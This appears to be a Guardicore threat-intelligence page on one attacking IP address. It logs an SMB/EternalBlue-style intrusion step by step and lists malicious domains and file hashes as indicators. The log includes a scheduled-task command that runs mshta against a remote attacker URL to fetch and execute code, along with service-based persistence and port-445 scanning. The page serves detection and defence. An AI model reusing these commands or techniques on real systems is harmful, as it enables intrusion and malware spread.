IP Address: 124.107.111.247Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
124.107.111.247​
Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

SMB

Tags

SMB Executable File Modification Listening Scheduled Task Creation Download and Execute Successful SMB Login System File Modification IDS - A Network Trojan was detected SMB Null Session Login Access Suspicious Domain Download File Driver Start Access Share Driver Configuration CMD Service Stop SMB Share Connect Service Configuration Service Deletion Port 445 Scan Service Creation Service Start Driver Creation DNS Query Cookie Hijacking Execute from Share Persistency - Logon

Associated Attack Servers

p.abbny.com i.haqo.net ii.haqo.net ip.42.pl pp.abbny.com w.beahh.com

Basic Information

IP Address

124.107.111.247

Domain

-

ISP

Philippine Long Distance Telephone

Country

Philippines

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2019-09-04

Last seen in Guardicore Centra

2021-03-20

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using SMB with the following username: Administrator - Authentication policy: Correct Password

Successful SMB Login

C:\AnsFHjJm.exe was downloaded

Download File

ansfhjjm.exe was executed from the remote share \\server-backup\c$

Execute from Share

c:\windows\system32\services.exe installed and started \\server-backup\c$\ansfhjjm.exe as a service named NOZY under service group None

Service Creation Service Start

Service NOZY was stopped

Service Stop

IDS detected A Network Trojan was detected : Possible ETERNALBLUE Probe MS17-010 (MSF style)

IDS - A Network Trojan was detected

IDS detected A Network Trojan was detected : Possible ETERNALBLUE Probe MS17-010 (Generic Flags)

IDS - A Network Trojan was detected

IDS detected A Network Trojan was detected : ETERNALBLUE Probe Vulnerable System Response MS17-010

IDS - A Network Trojan was detected

c:\windows\system32\services.exe installed and started cmd as a service named Ubyk under service group None

Service Creation Service Start

IDS detected A Network Trojan was detected : WMIC WMI Request Over SMB - Likely Lateral Movement

IDS - A Network Trojan was detected

The file c:\windows\system32\drivers\svchost.exe was downloaded and executed 5 times

Download and Execute

c:\windows\system32\services.exe installed and started cmd as a service named owUQ under service group None

Service Creation Service Start

The file C:\windows\temp\svchost.exe was downloaded and executed 6 times

Download and Execute

Service owUQ was stopped

Service Stop

Process c:\installed2.exe started listening on ports: 65533

Listening

System file C:\WINDOWS\system32\wbem\AutoRecover\88744D2A29102FC88ECF505DD2E984FC.mof was modified

System File Modification

The file C:\WINDOWS\Temp\_MEI13922\python27.dll was downloaded and loaded by c:\windows\temp\svchost.exe

Download and Execute

The file C:\WINDOWS\Temp\_MEI13922\msvcr90.dll was downloaded and loaded by c:\windows\temp\svchost.exe

Download and Execute

c:\windows\temp\ttt.exe set the command line C:\WINDOWS\system32\wmiex.exe to run using Persistency - Logon

Persistency - Logon

c:\windows\system32\services.exe installed and started c:\windows\system32\wmiex.exe as a service named WebServers under service group None

Service Creation Service Start

The file c:\windows\system32\wmiex.exe was downloaded and executed 2 times

Download and Execute

Process c:\windows\temp\svchost.exe started listening on ports: 60124 2 times

Listening

The command line C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\system32\wmiex.exe was scheduled to run by modifying C:\WINDOWS\Tasks\WebServers.job

The file c:\windows\system32\drivers\taskmgr.exe was downloaded and executed

Download and Execute

c:\windows\system32\services.exe installed and started c:\windows\system32\drivers\svchost.exe as a service named Ddriver under service group None 3 times

Service Creation Service Start

Executable file c:\windows\system32\drivers\svchost.exe was modified

Executable File Modification

Process c:\windows\system32\wmiex.exe attempted to access suspicious domains: ii.haqo.net and pp.abbny.com

DNS Query Access Suspicious Domain

Process c:\installed2.exe attempted to access suspicious domains: i.haqo.net

DNS Query Access Suspicious Domain

c:\installed2.exe set the command line C:\WINDOWS\system32\drivers\svchost.exe| to run using Persistency - Logon

Persistency - Logon

c:\windows\system32\services.exe installed and started system32\drivers\tcpip6.sys as a service named Tcpip6 under service group None

Service Creation Driver Start

The file C:\WINDOWS\Temp\_MEI24522\python27.dll was downloaded and loaded by c:\windows\temp\svchost.exe

Download and Execute

The file C:\WINDOWS\Temp\_MEI24522\msvcr90.dll was downloaded and loaded by c:\windows\temp\svchost.exe

Download and Execute

The command line C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\system32\drivers\svchost.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Ddrivers.job

System file C:\WINDOWS\security\Database\secedit.sdb was modified

System File Modification

c:\windows\system32\netsh.exe installed and started %systemroot%\system32\6to4svc.dll as a service named 6to4 under service group NetworkService

Service Creation Service Start

Process c:\windows\system32\drivers\svchost.exe started listening on ports: 65533

Listening

c:\windows\system32\services.exe installed and started system32\drivers\smb.sys as a service named Smb under service group None

Service Creation Driver Start

The command line C:\Windows\temp\svchost.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Autoscan.job

The command line C:\WINDOWS\system32\cmd.exe /c mshta http://w.beahh.com/page.html?pSERVER-BACKUP was scheduled to run by modifying C:\WINDOWS\Tasks\Autocheck.job

Process c:\windows\system32\drivers\svchost.exe attempted to access suspicious domains: i.haqo.net and p.abbny.com

DNS Query Access Suspicious Domain

Process c:\windows\temp\svchost.exe started listening on ports: 60124

Listening

Process c:\windows\temp\svchost.exe attempted to access domains: ip.42.pl

DNS Query

Process c:\windows\system32\mshta.exe attempted to access suspicious domains: w.beahh.com

DNS Query Access Suspicious Domain

c:\windows\system32\services.exe installed system32\drivers\tunmp.sys as a service named tunmp under service group None

Service Creation

Process netsvcs Service Group attempted to access suspicious domains: _LDAP._TCP

DNS Query Access Suspicious Domain

Process c:\windows\temp\svchost.exe generated outgoing network traffic to: 192.168.0.10:445, 192.168.0.11:445, 192.168.0.12:445, 192.168.0.13:445, 192.168.0.14:445, 192.168.0.15:445, 192.168.0.16:445, 192.168.0.17:445, 192.168.0.18:445, 192.168.0.1:445, 192.168.0.2:445, 192.168.0.3:445, 192.168.0.4:445, 192.168.0.5:445, 192.168.0.6:445, 192.168.0.7:445, 192.168.0.8:445 and 192.168.0.9:445

Process c:\windows\temp\svchost.exe scanned port 445 on 18 IP Addresses

Port 445 Scan

Connection was closed due to user inactivity

Associated Files

\\server-backup\c$\zilnbirc.exe

SHA256: 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71

56320 bytes

C:\Windows\Temp\_MEI6442\python27.dll

SHA256: e3eed66221a6552d4b9ae7350b3dc30de238a6029efae060514d2780c02fedb4

2640384 bytes

C:\Windows\temp\upinstalled.exe

SHA256: bdbfa96d17c2f06f68b3bcc84568cf445915e194f130b0dc2411805cf889b6cc

201776 bytes

C:\Windows\Temp\ttt.exe

SHA256: b771267551961ce840a1fbcd65e8f5ecd0a21350387f35bbcd4c24125ec04530

73776 bytes

C:\Windows\temp\svchost.exe

SHA256: 60b6d7664598e6a988d9389e6359838be966dfa54859d5cb1453cbc9b126ed7d

5916920 bytes

C:\Windows\Temp\_MEI6482\msvcr90.dll

SHA256: 8e7fe1a1f3550c479ffd86a77bc9d10686d47f8727025bb891d8f4f0259354c8

653136 bytes

C:\WINDOWS\system32\drivers\taskmgr.exe

SHA256: 01b842cab76c78a1d9860ade258923772fe3b08ae7a428d5f54e1bf9d9c3b205

49200 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 124.107.111.247​Malicious